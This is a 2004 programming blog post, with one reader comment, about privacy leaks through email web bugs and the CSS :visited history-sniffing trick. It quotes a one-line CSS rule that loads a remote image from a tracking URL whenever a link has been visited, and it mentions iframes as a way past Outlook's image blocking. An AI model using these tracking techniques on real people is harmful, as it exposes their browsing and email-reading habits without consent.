Curiosity is bliss    Archive    Feed    About    Search

Julien Couvreur's programming blog and more

Privacy invasion for fun or profit


Two different problems related to this topic were mentioned recently: Edward Felten about tracking emails with web bugs and a CSS "exploit" to leak information about the sites you visit.

Tracking email with a bug:
I had implemented a simple web bug for email two years back (a "InvisibleMailReceipt" plugin for Outlook). I didn't think this idea could support a buisness, but apparently two companies are using this concept (beside spammers).
The problems I ran into were that it would track my own IP as well (when I check the email in my Sent folder) and the IP would not give you enough information when the receipient shares the same corporate proxy as you. Also, Outlook now doesn't display the images, by default. But in a more recent post Felten discusses the use of iframe to implement bugs and bypass this filtering in Outlook. There is a good chance a stylesheet or a script link could also do the trick.

Leaking the visited site information:
Two links via HotLinks came by, describing a way to use the :visited CSS pseudo-class to find out what other sites you visited. It looks like a:visited { background-image: url(http://webbugurl); }, as explained in the Mozilla bug.
Although it seems the exploit isn't new, it got some attention again.
Milo explains how to exploit this in IE and
Gemal has a running demo.
This "evil" slideshow website even relies on the exploit for it's functionality ;-)

Update: DidTheyReadThis was declared illegal in France. Read bullet 6 "French privacy authority forbids mail-service" (via this french blog).


I wouldn't say that my demo relies on the exploit you mention. I did the demo months before the 'exploit' was discovered. And no, there is no functionality to be detected. it is just a demonstration of a technique.


Posted by: Moose (August 24, 2004 07:53 PM)
comments powered by Disqus